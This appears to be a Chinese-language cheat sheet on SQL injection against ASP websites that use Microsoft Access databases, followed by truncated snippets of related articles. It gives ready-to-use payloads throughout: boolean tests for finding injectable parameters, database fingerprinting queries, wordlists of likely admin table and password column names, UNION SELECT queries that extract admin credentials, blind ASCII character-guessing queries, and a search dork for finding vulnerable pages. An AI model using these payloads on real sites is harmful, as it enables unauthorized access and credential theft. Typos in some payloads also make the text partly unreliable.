asp鏈結access資料庫**
「driver=;dbq=.mdb;uid=admin;pwd=pass」
dim conn
set conn = server.createobject(「adodb.connection」)
access注入原理
判斷注入點:
and 1=1
and 1=2
-0-1
判斷資料庫注入:
and exists(select * from msysobjects)>0 判斷access資料庫
and exists(select * from sysobjects)>0 判斷sqlserver資料庫
access資料庫
判斷資料庫表:and exists(select * from admin)
判斷資料庫表:and exists(selext admin from admin)
access資料庫常見的表明:
admin
admin_user
admin_msg
admin_usr
admin_login
username
manager
manag
msg_user
msg_login
useradmin
user_msg
userlogin
users
member
管理員表下常見的管理員列名:
admin
admin_user
username
users
usruser_login
user_name
name
loginname
admin_login
msg_name
密碼列名:
pwdpassword
pass
user_pass
passwd
判斷字段長度:order by xx
聯合查詢:and 1=2 union select 1,2,3,4,5,6,7,8,9 from admin
資料庫聯合查詢:and 1=2 union select 1,2,admin,4,password,6,7,8,9 from admin
判斷賬號密碼的長度:
and (select len(admin) from admin)=5 如果返回正常說明管理員賬號的長度為5
and (select len(password) from admin)=5 猜解管理員密碼長度是否為5
inurl:asp?id=
猜解管理員賬號的第一資料,通過ascii碼判斷:
and(select top 1 asc(mid(admin,1,1))from admin)>100: 返回正常說明大於不正常說明不大於
and(select top 1 asc(mid(admin,1,1))from admin)>50: 返回正常說明大於
and(select top 1 asc(mid(admin,1(代表列),1(代表行)))from admin)=97: 返回正常說明等於97 97對應數字為a以此類推
Access資料庫注入詳解
access資料庫注入詳解 一 判斷資料庫 1.access and exists select from msysobjects 0 2.sqlserver and exists select from sysobjects 0 二 判斷資料庫中的表 and exsits select from ...
Access資料庫注入方法
檢測注入型別 1.數字型 and 1 1 返回正常頁面 and 1 2 返回錯誤頁面或者和1 1返回的頁面不同 2.字元型 and 1 1 and 返回正常頁面 and 1 2 and 返回錯誤頁面或者和1 1返回的頁面不同 3.搜尋型 and 1 1 and 返回正常頁面 and 1 2 and ...
ACCESS資料庫的注入
access資料庫的注入access資料庫的注入與mssql不同,要得到表名,字段,以及欄位的內容不能用mssql 暴 的方法直接得 到,access只能用猜解出表名和字段,然後再猜解出字段的長度,最後把字段的內容從第一位到第n位乙個個猜 解出來,採用的猜解方法類似玩乙個遊戲猜大小,比如乙個數字,猜...